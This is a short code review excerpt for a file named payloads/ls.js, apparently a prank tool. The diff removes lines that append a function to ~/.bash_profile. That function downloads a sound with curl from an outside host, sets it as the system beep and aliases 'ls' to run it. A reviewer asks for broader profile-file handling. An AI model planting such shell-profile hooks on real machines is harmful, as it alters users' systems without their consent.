payloads/ls.js

```diff
@@ -1,5 +1,12 @@
 module.exports = `
-echo "function eles() { if [ ! -e /tmp/x.out ]; then curl -sL hoku.me/assets/airhorn > /tmp/x.out; fi; defaults write .GlobalPreferences com.apple.sound.beep.sound /tmp/x.out; }" >> ~/.bash_profile
-echo "alias ls='eles && ls'" >> ~/.bash_profile
-source ~/.bash_profile
+if [ -f ~/.profile ] 
```

Comment:
a) can you use the conditional to set a variable so we don't repeat the same logic for each possible profile file (e.g. `echo content >> $PROFILE_PATH`)
b) can you include a conditional for `.bash_login` as per the bash manual: 
```it looks for ~/.bash_profile, ~/.bash_login, and ~/.profile, in that order, and reads and executes commands from the first one that exists and is readable.```